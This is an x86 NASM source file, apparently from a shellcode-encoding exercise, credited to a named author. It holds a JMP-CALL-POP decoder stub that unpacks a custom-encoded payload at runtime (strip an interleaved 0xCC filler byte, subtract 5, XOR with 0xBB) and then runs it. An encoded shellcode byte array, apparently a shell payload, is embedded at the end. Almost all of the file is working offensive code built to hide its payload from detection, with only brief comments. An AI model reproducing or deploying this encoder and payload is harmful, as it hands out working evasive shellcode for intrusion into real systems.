; Filename: decoder.nasm
; Author:  Bohan Zhang
; Website:  https://bohansec.com/
;
;
; Purpose: Decode the encoded shellcode
global _start			

section .text
_start:
	jmp short call_shellcode

decoder:
	pop esi ;esi points to the address at beginning of the shellcode
	sub byte [esi], 0x5 ;minus the value pointed by esi with 5 byte
	xor byte [esi], 0xBB ;xor the value points nu esi with 0xBB 
	lea edi, [esi +1] ;load the address of the next byte to edi
	xor eax, eax ;initalize eax with 0
	mov al, 1 ;initalize eax to 1
	xor ebx, ebx ; initialize ebx to 0


decode:
	mov bl, byte [esi + eax] ;move 0xcc to ebx
	xor bl, 0xcc ;ebx XOR with 0xcc, it either be 0 or non 0
	jnz short Shellcode ;if the xor does not end with 0, means reach the end, jump to execute the shell
	mov bl, byte [esi + eax + 1] ;move the value at two bytes away to the ebx
	mov byte [edi], bl;move the two bytes away value to the address where 0xcc used to be, which is where edi now points to
	sub byte [edi], 0x5 ;minus 5 bytes where edi points to
	xor byte [edi], 0xBB ; XOR the value edi points to with 0xBB
	inc edi ;point edi to the next address
	add al, 2 ;eax points to two bytes away, to another 0xcc
	jmp short decode

call_shellcode:

	call decoder
	Shellcode: db 0x8f,0xcc,0x80,0xcc,0x8f,0xcc,0x65,0xcc,0x8f,0xcc,0x77,0xcc,0x8f,0xcc,0x6e,0xcc,0x8f,0xcc,0x52,0xcc,0x8f,0xcc,0x49,0xcc,0xe2,0xcc,0x08,0xcc,0xe1,0xcc,0xbf,0xcc,0x0d,0xcc,0xbe,0xcc,0x0f,0xcc,0xbf,0xcc,0x7b,0xcc,0x40,0xcc,0x37,0xcc,0x82,0xcc,0x37,0xcc,0x7d,0xcc,0x0f,0xcc,0xbd,0xcc,0x8f,0xcc,0x80,0xcc,0x10,0xcc,0x89,0xcc,0x7b,0xcc,0x40,0xcc,0xf7,0xcc,0xc7,0xcc,0x51,0xcc,0x8f,0xcc,0x65,0xcc,0x37,0xcc,0x4d,0xcc,0xe2,0xcc,0x08,0xcc,0xd6,0xcc,0xbf,0xcc,0xf1,0xcc,0xd8,0xcc,0x80,0xcc,0x18,0xcc,0x78,0xcc,0x38,0xcc,0xe2,0xcc,0xd8,0xcc,0xaf,0xcc,0xec,0xcc,0xe2,0xcc,0xd6,0xcc,0xbe,0xcc,0x37,0xcc,0x5f,0xcc,0x0e,0xcc,0xe2,0xcc,0x7b,0xcc,0x40,0xcc,0x8f,0xcc,0x80,0xcc,0xf0,0xcc,0xd8,0xcc,0x99,0xcc,0x99,0xcc,0xcd,0xcc,0xd8,0xcc,0xd8,0xcc,0x99,0xcc,0xde,0xcc,0xd7,0xcc,0xda,0xcc,0x37,0xcc,0x5d,0xcc,0xf0,0xcc,0x37,0xcc,0x5e,0xcc,0xed,0xcc,0x37,0xcc,0x5f,0xcc,0x10,0xcc,0xb5,0xcc,0x7b,0xcc,0x40,0xcc,0xdd,0xdd





